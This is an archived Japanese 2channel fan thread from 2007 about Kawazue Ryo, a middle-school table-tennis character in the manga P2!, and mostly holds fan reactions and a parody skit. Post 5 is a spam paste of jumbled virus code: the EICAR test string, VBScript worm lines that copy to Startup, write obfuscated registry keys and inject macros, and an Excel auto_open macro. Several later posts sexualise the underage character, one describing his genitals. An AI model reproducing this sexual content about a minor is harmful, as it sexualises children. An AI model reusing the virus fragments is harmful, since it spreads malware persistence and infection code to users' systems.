5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【P2!】川末涼に萌えるスレ2【病院息子】

1 :名無しかわいいよ名無し:2007/11/04(日) 14:27:54 ID:2+uODf1Z
落ちたので立ててみました。さあ萌えよう。

前スレ
【P2!】川末涼に萌えたり語ったりするスレ【病院息子】
http://anime2.2ch.net/test/read.cgi/cchara/1180290832/

2 :名無しかわいいよ名無し:2007/11/04(日) 14:30:27 ID:2+uODf1Z
前スレのスレタイ間違えたorz

3 :名無しかわいいよ名無し:2007/11/04(日) 14:59:13 ID:03vdWwWG
>>1
「乙は乙の、俺の卓球を貫く!」

4 :名無しかわいいよ名無し:2007/11/04(日) 15:50:46 ID:FpzqqXPK
>>1
川末かわいいよ川末

5 :名無しかわいいよ名無し:2007/11/04(日) 18:35:09 ID:s34GyKRT
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


6 :名無しかわいいよ名無し:2007/11/04(日) 22:43:31 ID:zXDgQ7uH
>>1GJ

タイトルだけ思いついたんだが俺の萌力では料理しきれないからこっちに投下
うまく扱えるネタ師さんがいたら好きに使ってくれ

つ【ツンデレカットマンKAWAZUE!】

7 :名無しかわいいよ名無し:2007/11/04(日) 22:59:39 ID:ujrXM67D
あぁ……やっぱ川末ってツンデレ扱いなんだな。
いや、ツンデレだと思ってたんだけどね。

8 :名無しかわいいよ名無し:2007/11/04(日) 23:28:01 ID:IXIPJ6t1
1&2巻を読んだだけでツンデレだと思ったよ

9 :名無しかわいいよ名無し:2007/11/04(日) 23:46:26 ID:T5FU+cvH
川末のツンデレは2話の最初が酷い。
「手垢が付いて使用に耐えん」とか言ってヒロムにラケットあげるとかどんだけwwww
しかも今になって「使い慣れたラケットは自分の分身」とか言っちゃってwwwww

10 :名無しかわいいよ名無し:2007/11/05(月) 00:09:05 ID:Cpl3R9N3
>>9
雑草が生えてて見るに耐えん 刈ってしまえ

こうですか?わかりません!!

11 :名無しかわいいよ名無し:2007/11/05(月) 07:34:36 ID:0Gx8/9K8
川末は過保護でもあるよな。眞白のこと言えない。

12 :名無しかわいいよ名無し:2007/11/05(月) 22:34:10 ID:x/nuGcHj
遊部の回想で川末が苦笑してるように見える。
一年の頃は今より笑ってたのか。

13 :ショ卓球スマッシュ ◆Q/9D3T5/i. :2007/11/06(火) 00:54:25 ID:pW34G3JW
大佐スレもようやくP2からP2!になったか。
これで検索しやすくなった。

14 :名無しかわいいよ名無し:2007/11/06(火) 08:04:21 ID:QQeA14hZ
おおようやくスレ立ったか

15 :名無しかわいいよ名無し:2007/11/06(火) 08:05:54 ID:QQeA14hZ
あ、一乙

16 :名無しかわいいよ名無し:2007/11/07(水) 03:27:49 ID:osgthchG
>>6
せっかくだから使ってみた
リボーソキャラの盛り合わせになっててごめんorz



入部テストにて
「一点ぐらいならまぐれでとれると思ったかい?
 二人まとめて咬み殺してやる」
「一球だ。それ以上チャンスはやらん。その一球で
 貴様の『死ぬ気』を見せてみろ」

新歓の的当てゲームにて
「クフフ…考えましたね、遊部。これなら藍川も自然な形で
 練習に参加できる…。レシーブを覚える迄の時間を
 苦痛なく過ごすことができる」

部員の中に紛れ込んでいる乙女を見つけて
「部外者は出て行けぇ!!さもないと三枚におろすぞぉ!」

王華との練習試合・柳青州戦にて
「僕は極限に…俺の卓球を貫く!!」
「主将(キャプテン)、見ててください、僕の技術の粋…!!
 いくぞ、青州!3倍カット!!」

試合後・晶と
涼「来ていたのか」
晶「…ええ、もう王華の男子レベルでないと練習相手に
 ならないので」
涼「そうか。極限に頑張れ!!」
晶「…」
晶「『警告』しとくよ。いずれ彼は貴方より強くなる、
 どう足掻いても追いつけない程に」
涼「そうか。極限に楽しみだ!!」
晶「…(-_-メ)」

17 :名無しかわいいよ名無し:2007/11/07(水) 23:25:59 ID:sgjzxTrt
1乙!
川末は末が楽しみ!

18 :名無しかわいいよ名無し:2007/11/09(金) 10:39:46 ID:2UtYbnSr
川末の試合、ちゃんと描かれるだろうか
戦型関連の伏線も回収されずに終わる気がしてならない

19 :名無しかわいいよ名無し:2007/11/10(土) 05:16:21 ID:NKjOm225
最後まで応援するのだ!

20 :名無しかわいいよ名無し:2007/11/10(土) 12:09:24 ID:Wz4JuKoD
うおおお始まった

ワンカット川末の尻の形が見えて嬉しい´Д`

21 :名無しかわいいよ名無し:2007/11/10(土) 21:55:41 ID:Wz4JuKoD
しかし最近、川末の顔は手抜きをしているような気がしてならない
もう少しちゃんと表情を描いてくれないと。。

22 :名無しかわいいよ名無し:2007/11/11(日) 18:27:56 ID:R3IMhtJP
>>16
吹いたwwwwwww

23 :名無しかわいいよ名無し:2007/11/11(日) 23:22:54 ID:ncO+K0lD
川末!大好きだ!

24 :名無しかわいいよ名無し:2007/11/12(月) 23:24:15 ID:r2/W896m
川末、あっという間に水無瀬を下してしまったな……。

25 :名無しかわいいよ名無し:2007/11/13(火) 00:25:40 ID:t909UjHU
1セットが1コマ・・・。もっと川末の卓球してるところを見たいが仕方ないか。
戦型関連の伏線回収に期待するとしよう。

26 :名無しかわいいよ名無し:2007/11/14(水) 01:40:27 ID:Vvrh1kiL
ブラコンらしい晶にwktkが止まりません!

27 :名無しかわいいよ名無し:2007/11/15(木) 15:10:43 ID:Ig7/tx7J


28 :名無しかわいいよ名無し:2007/11/15(木) 23:20:42 ID:COFc/IPT
川末と水無瀬の絡みを見たい!

29 :名無しかわいいよ名無し:2007/11/16(金) 02:34:40 ID:q/O7Q5hK
>>26
同意!あのセリフでニヤニヤが止まらなくなった…!

30 :名無しかわいいよ名無し:2007/11/16(金) 23:14:36 ID:W5OKGf4o
川末きゅん、愛してるよ!

31 :名無しかわいいよ名無し:2007/11/17(土) 19:44:24 ID:2h8np/aG
川末きゅんが負けちゃったおorz
おーんおんおん(;;ω;;)

32 :名無しかわいいよ名無し:2007/11/17(土) 19:46:59 ID:2h8np/aG
>>28
その絡みは見たい
リードするのはどっち?
攻めるのはどっちで受けるのはどっち?

33 :名無しかわいいよ名無し:2007/11/17(土) 23:52:14 ID:vGUBCg5p
ネタバレすんな!

34 :名無しかわいいよ名無し:2007/11/18(日) 07:53:51 ID:jgsoNjtP
か、絡みってネタばれだったのか!!!!!!1111111

35 :名無しかわいいよ名無し:2007/11/18(日) 23:52:28 ID:YCRxD6gK
>>34
いや>>31のこと。

36 :名無しかわいいよ名無し:2007/11/19(月) 07:07:19 ID:GZcl4awI
>>35
おいおい、ネタバレすんなよw
せっかく>>34に期待膨らませてたのにw

37 :名無しかわいいよ名無し:2007/11/19(月) 18:57:58 ID:tcqzmSYR
最初は川末の圧倒的優勢で終わるかと思われたが
自分のプレイを始めた水無瀬にじわじわと攻めたてられ
無我夢中の水無瀬に筋力差で食い尽くされる川末

素でねちこいエロを感じた

38 :名無しかわいいよ名無し:2007/11/19(月) 21:09:29 ID:MncYZDUI
晶むかつく、晶がよけいな事言わなかったら川末勝ててたのに


39 :名無しかわいいよ名無し:2007/11/20(火) 00:14:19 ID:Ga+NguVC
川末がかわいそう(´;ω;`)
川末は無様なんかじゃないやい!

40 :名無しかわいいよ名無し:2007/11/20(火) 22:21:04 ID:oIfCuso5
川末…俺はお前を応援してる!

41 :名無しかわいいよ名無し:2007/11/20(火) 22:30:48 ID:oIfCuso5
【P2!】水無瀬修哉に萌えるスレ!【秀鳳】
http://anime2.2ch.net/test/read.cgi/cchara/1195565008/

42 :名無しかわいいよ名無し:2007/11/20(火) 22:32:05 ID:QzLeDnY8
来週は妹と和解すんのかな?

43 :名無しかわいいよ名無し:2007/11/20(火) 22:39:02 ID:3r5YyqFL
あくまで自分の卓球を続ける彼はかっこいいな。たとえ負けても。

44 :名無しかわいいよ名無し:2007/11/20(火) 23:08:31 ID:nYU39Q4L
俺は晶良いと思うけどな?
あの兄妹は今と昔を比べると凄く微笑ましいというか、応援したくなる。
あとあの理由には納得。んで晶があそこまで言う理由というか過去を知りたい。
>>43に激しく同意。すごくかっこいいと思った。かわいそうとは思わない。

45 :名無しかわいいよ名無し:2007/11/20(火) 23:24:02 ID:OJhCtmG1
俺も可哀想だとは思わんけど、すげぇ切ない。
川末の生き様が格好良すぎる……これで中2か……。

46 :名無しかわいいよ名無し:2007/11/21(水) 08:09:51 ID:xyfPKTmG
川末…自分の限界を知って挫折した時に、慰めようとした晶に猛烈に八つ当たりして仲が悪くなった、という夢を見た…。

47 :名無しかわいいよ名無し:2007/11/21(水) 18:03:47 ID:9mNAVj5W
川末はクールな男だな。

48 :名無しかわいいよ名無し:2007/11/22(木) 10:24:37 ID:vK7whD5J
しかし、意外と人思いのところもある。

49 :名無しかわいいよ名無し:2007/11/22(木) 20:55:44 ID:MxQ9RETq
クールだねえ

50 :名無しかわいいよ名無し:2007/11/23(金) 03:59:13 ID:Zjuv4ZRz
川末かっこいいな
あーあ、いつか覚醒して努力が報われるところが見たかったのに

51 :名無しかわいいよ名無し:2007/11/23(金) 05:34:28 ID:B4EwIBcD
これで挫折を知った川末が、
悪夢にうなされて目を覚ますと夢精していた、っていう展開キボンヌ

52 :名無しかわいいよ名無し:2007/11/23(金) 12:44:49 ID:flCx81UV
このキャラのスレがあるとは思わなかった

川末にあんなハンデがあったんだな
でも真面目に部活やってて感動した
最近P2が好きになり始めたのに終わってしまうのは悲しい

53 :名無しかわいいよ名無し:2007/11/23(金) 22:52:21 ID:96rB7UHD
川末にも弱点があったなんて人間らしくていいじゃないか?

54 :名無しかわいいよ名無し:2007/11/23(金) 23:19:03 ID:of64IesK
弱点なかったら最強なんだろうが、弱点なかったらここまで努力しなかったかな?

55 :ショ卓球スマッシュ ◆Q/9D3T5/i. :2007/11/24(土) 17:48:57 ID:PE/h9a62
もがき、挑み、足掻く。それが大佐の生き方。か、漢だな。

56 :名無しかわいいよ名無し:2007/11/25(日) 10:55:26 ID:TqEYoeaq
終わっちゃったな。
でもここまでなんとか持ちこたえたのも、川末兄妹のファンあってこそ。
ちゃんとそれわかってて最終話をあれで締めくくるなんて不憫すぐる
(´;ω;`)ブワッ

57 :名無しかわいいよ名無し:2007/11/25(日) 19:59:17 ID:RCmfe+ka
川末の股間をペロペロ舐めたい!

58 :名無しかわいいよ名無し:2007/11/26(月) 00:38:32 ID:/kQnWyFA
大佐…がんばってくれ
君ならいつか最強になれる。俺はそう信じている

59 :名無しかわいいよ名無し:2007/11/26(月) 04:54:21 ID:3gJJoxpH
川末いい男やのう

60 :名無しかわいいよ名無し:2007/11/26(月) 23:01:52 ID:IqJefUcu
最終回にして判ったことは大佐は対戦した自分の信者を
次々と精神崩壊に追い込む奇癖の持ち主

61 :ショ卓球スマッシュ ◆Q/9D3T5/i. :2007/11/26(月) 23:29:28 ID:YlWvh82c
最終回で大佐が一段と好きになってしまった。
どうしてくれる江尻ん(;´Д`)

62 :名無しかわいいよ名無し:2007/11/26(月) 23:36:48 ID:7ShjA4dc
最終回まで「僕」を使った川末!

63 :名無しかわいいよ名無し:2007/11/27(火) 00:31:49 ID:K67sQe2S
本スレとは裏腹な過疎ぶり

64 :名無しかわいいよ名無し:2007/11/27(火) 00:38:50 ID:jDUrrq56
負けてもこんなに格好良い男はそうそういねー……川末男前すぎる。

65 :名無しかわいいよ名無し:2007/11/27(火) 23:47:44 ID:BwcinML0
川末!お前が大好きだ!

66 :名無しかわいいよ名無し:2007/11/28(水) 15:46:38 ID:lGeIkGLa
川末のズボンを脱がしてみたい!

67 :名無しかわいいよ名無し:2007/11/28(水) 16:13:12 ID:Z4z74vCs
妹抱いてやれよ

68 :名無しかわいいよ名無し:2007/11/28(水) 19:51:08 ID:VjCP72E/
>>67
むしろ抱き過ぎたせいだろ
どう見ても調教完了済みの反動だあれは

69 :名無しかわいいよ名無し:2007/11/29(木) 23:47:40 ID:N1nwkyuJ
川末のチンポってもう皮剥けてる?

70 :名無しかわいいよ名無し:2007/11/30(金) 06:17:28 ID:5+ANV2Lm
>>69
まだだよ。
ちんこの上に軽く毛は生えてるけど
袋には生えてないし。

71 :名無しかわいいよ名無し:2007/11/30(金) 15:35:31 ID:c5IkJok4
川末のおしっこって汚くなさそうだな。

72 :名無しかわいいよ名無し:2007/12/01(土) 13:23:51 ID:06xNKfPI
川末の腎臓は特別に出来てるからな。

73 :名無しかわいいよ名無し:2007/12/01(土) 19:56:57 ID:kwoC1Jdg
うん、実はサイボーグなんだ、すまない。


74 :名無しかわいいよ名無し:2007/12/02(日) 00:31:49 ID:YRlZCKaO
新ジャンル「非力サイボーグ」

75 :名無しかわいいよ名無し:2007/12/02(日) 11:21:09 ID:0vHM8ijx
川末は美味しいおしっこを出すことができます。

76 :名無しかわいいよ名無し:2007/12/03(月) 22:06:51 ID:AISGPZI9
連載が終わるとここも寂しくなったな…。

14 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)